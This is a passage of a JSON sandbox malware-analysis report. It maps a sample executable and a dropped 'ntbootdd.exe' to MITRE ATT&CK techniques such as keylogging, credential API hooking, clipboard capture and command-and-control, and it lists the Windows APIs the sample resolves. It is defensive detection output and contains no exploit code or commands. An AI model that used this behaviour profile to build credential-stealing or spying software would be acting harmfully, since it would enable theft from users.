"informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 3, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "malicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Impact", "technique": "Internal Defacement", "attck_id": "T1491.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Defacement", "attck_id": "T1491", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491"}}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionAndSpinCount (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter ProcessIdToSessionId (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter ImmCreateContext (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter ImmDestroyContext (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter capGetDriverDescriptionA (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter capCreateCaptureWindowA (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter AllocateAndGetTcpExTableFromStack (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter AllocateAndGetUdpExTableFromStack (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter IsNTAdmin (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00006128)\n \"208f2e064735793c173bdcbdbca3a859a4ab1d46de5333dce9fc4f3adecff360.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00006128)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter capGetDriverDescriptionA (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter capCreateCaptureWindowA (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter AllocateAndGetTcpExTableFromStack (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter AllocateAndGetUdpExTableFromStack (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter IsNTAdmin (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CreateMutexA (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter MessageBoxA (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter ExitThread (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00005888)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionAndSpinCount (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter ProcessIdToSessionId (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter ImmCreateContext (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter ImmDestroyContext (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter capGetDriverDescriptionA (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter capCreateCaptureWindowA (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter AllocateAndGetTcpExTableFromStack (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter AllocateAndGetUdpExTableFromStack (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter IsNTAdmin (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CreateMutexA (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter MessageBoxA (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter ExitThread (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00003108)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003788)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00003788)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00003788)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00003788)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00003788)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00003788)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00003788)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00003788)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00003788)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00003788)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00003788)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00003788)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter IsNTAdmin (UID: 00000000-00003788)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00003788)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00003788)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003788)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00003788)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter IsNTAdmin (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00004420)\n \"ntbootdd.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00004420)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"0d000e00cc543e72@KERNELBASE.dll\"\n \"0d000e00341b3e72@KERNELBASE.dll\"\n 